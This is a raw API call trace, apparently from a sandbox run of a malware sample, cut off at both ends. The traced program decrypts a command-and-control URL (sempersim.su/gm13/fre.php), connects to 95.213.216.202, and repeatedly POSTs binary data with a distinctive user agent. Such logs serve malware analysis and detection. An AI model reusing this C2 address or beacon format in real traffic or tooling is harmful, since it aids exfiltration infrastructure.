hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0267.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc18) returned 0x3f4 [0267.858] Sleep (dwMilliseconds=0xea60) [0267.891] GetProcessHeap () returned 0x620000 [0267.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0267.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.892] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.904] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0267.910] GetProcessHeap () returned 0x620000 [0267.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0267.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.911] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0267.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.912] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.913] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.913] GetProcessHeap () returned 0x620000 [0267.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0267.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.914] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0267.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.915] CryptDestroyKey (hKey=0x62d190) returned 1 [0267.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.916] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0267.916] GetProcessHeap () returned 0x620000 [0267.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0267.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0267.919] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0267.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0267.920] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0267.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0267.921] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0267.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0267.921] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0267.922] GetProcessHeap () returned 0x620000 [0267.922] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0267.922] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0267.922] GetProcessHeap () returned 0x620000 [0267.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0267.923] GetProcessHeap () returned 0x620000 [0267.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0267.923] GetProcessHeap () returned 0x620000 [0267.924] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0267.924] GetProcessHeap () returned 0x620000 [0267.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435a8 [0267.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.925] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0267.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.929] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0267.942] GetProcessHeap () returned 0x620000 [0267.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0267.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.943] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0267.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.947] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0267.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.948] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0267.948] GetProcessHeap () returned 0x620000 [0267.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0267.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.949] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6435a8, pdwDataLen=0x19fcfc | out: pbData=0x6435a8, pdwDataLen=0x19fcfc) returned 1 [0267.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.950] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0267.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0267.950] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0267.950] GetProcessHeap () returned 0x620000 [0267.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0267.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0267.951] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0267.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0267.952] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0267.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0267.953] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0267.953] GetProcessHeap () returned 0x620000 [0267.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0267.953] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c410*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0267.955] GetProcessHeap () returned 0x620000 [0267.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b610 [0267.955] socket (af=2, type=1, protocol=6) returned 0x3f8 [0267.955] connect (s=0x3f8, name=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0268.011] FreeAddrInfoW (pAddrInfo=0x63c410*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea90*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0268.011] GetProcessHeap () returned 0x620000 [0268.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0268.011] GetProcessHeap () returned 0x620000 [0268.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0268.013] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0268.014] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0268.014] GetProcessHeap () returned 0x620000 [0268.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0268.014] GetProcessHeap () returned 0x620000 [0268.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0268.015] GetProcessHeap () returned 0x620000 [0268.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6433f8 [0268.015] GetProcessHeap () returned 0x620000 [0268.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0268.017] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0268.018] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0268.018] GetProcessHeap () returned 0x620000 [0268.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0268.018] GetProcessHeap () returned 0x620000 [0268.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0268.019] send (s=0x3f8, buf=0x63a880*, len=237, flags=0) returned 237 [0268.019] send (s=0x3f8, buf=0x6421e0*, len=159, flags=0) returned 159 [0268.019] GetProcessHeap () returned 0x620000 [0268.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0268.019] recv (in: s=0x3f8, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0268.474] GetProcessHeap () returned 0x620000 [0268.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0268.475] GetProcessHeap () returned 0x620000 [0268.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6433f8 | out: hHeap=0x620000) returned 1 [0268.475] GetProcessHeap () returned 0x620000 [0268.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0268.475] GetProcessHeap () returned 0x620000 [0268.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0268.475] closesocket (s=0x3f8) returned 0 [0268.476] GetProcessHeap () returned 0x620000 [0268.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b610 | out: hHeap=0x620000) returned 1 [0268.476] GetProcessHeap () returned 0x620000 [0268.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0268.476] GetProcessHeap () returned 0x620000 [0268.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435a8 | out: hHeap=0x620000) returned 1 [0268.477] GetProcessHeap () returned 0x620000 [0268.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0268.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc1c) returned 0x3f8 [0268.496] Sleep (dwMilliseconds=0xea60) [0268.522] GetProcessHeap () returned 0x620000 [0268.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0268.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.523] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.530] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0268.537] GetProcessHeap () returned 0x620000 [0268.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0268.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.537] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0268.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.538] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.539] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.539] GetProcessHeap () returned 0x620000 [0268.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0268.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.540] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0268.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.541] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0268.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.542] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0268.542] GetProcessHeap () returned 0x620000 [0268.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0268.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0268.545] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0268.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0268.546] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0268.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0268.546] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0268.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0268.547] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0268.547] GetProcessHeap () returned 0x620000 [0268.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0268.547] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0268.548] GetProcessHeap () returned 0x620000 [0268.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0268.548] GetProcessHeap () returned 0x620000 [0268.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0268.549] GetProcessHeap () returned 0x620000 [0268.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0268.549] GetProcessHeap () returned 0x620000 [0268.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0268.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.550] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0268.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.554] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0268.562] GetProcessHeap () returned 0x620000 [0268.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0268.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.563] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0268.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.563] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0268.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.564] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0268.564] GetProcessHeap () returned 0x620000 [0268.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0268.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.566] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0268.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.567] CryptDestroyKey (hKey=0x62d710) returned 1 [0268.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0268.567] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0268.567] GetProcessHeap () returned 0x620000 [0268.567] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0268.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0268.568] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0268.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0268.569] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0268.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0268.570] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0268.570] GetProcessHeap () returned 0x620000 [0268.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0268.570] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c528*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0268.572] GetProcessHeap () returned 0x620000 [0268.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b640 [0268.572] socket (af=2, type=1, protocol=6) returned 0x3fc [0268.572] connect (s=0x3fc, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0268.623] FreeAddrInfoW (pAddrInfo=0x63c528*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0268.623] GetProcessHeap () returned 0x620000 [0268.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0268.623] GetProcessHeap () returned 0x620000 [0268.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0268.624] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0268.625] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0268.625] GetProcessHeap () returned 0x620000 [0268.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0268.625] GetProcessHeap () returned 0x620000 [0268.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0268.626] GetProcessHeap () returned 0x620000 [0268.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642dc8 [0268.626] GetProcessHeap () returned 0x620000 [0268.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0268.626] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0268.627] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0268.627] GetProcessHeap () returned 0x620000 [0268.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0268.627] GetProcessHeap () returned 0x620000 [0268.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0268.628] send (s=0x3fc, buf=0x63a880*, len=237, flags=0) returned 237 [0268.628] send (s=0x3fc, buf=0x6421e0*, len=159, flags=0) returned 159 [0268.629] GetProcessHeap () returned 0x620000 [0268.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0268.629] recv (in: s=0x3fc, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0270.374] GetProcessHeap () returned 0x620000 [0270.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0270.374] GetProcessHeap () returned 0x620000 [0270.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642dc8 | out: hHeap=0x620000) returned 1 [0270.375] GetProcessHeap () returned 0x620000 [0270.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0270.375] GetProcessHeap () returned 0x620000 [0270.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0270.376] closesocket (s=0x3fc) returned 0 [0270.388] GetProcessHeap () returned 0x620000 [0270.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b640 | out: hHeap=0x620000) returned 1 [0270.388] GetProcessHeap () returned 0x620000 [0270.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0270.389] GetProcessHeap () returned 0x620000 [0270.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0270.389] GetProcessHeap () returned 0x620000 [0270.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0270.390] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc2c) returned 0x3fc [0270.393] Sleep (dwMilliseconds=0xea60) [0270.403] GetProcessHeap () returned 0x620000 [0270.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0270.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.404] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.410] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0270.431] GetProcessHeap () returned 0x620000 [0270.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0270.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.432] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0270.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0270.434] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.435] LoadLibraryW 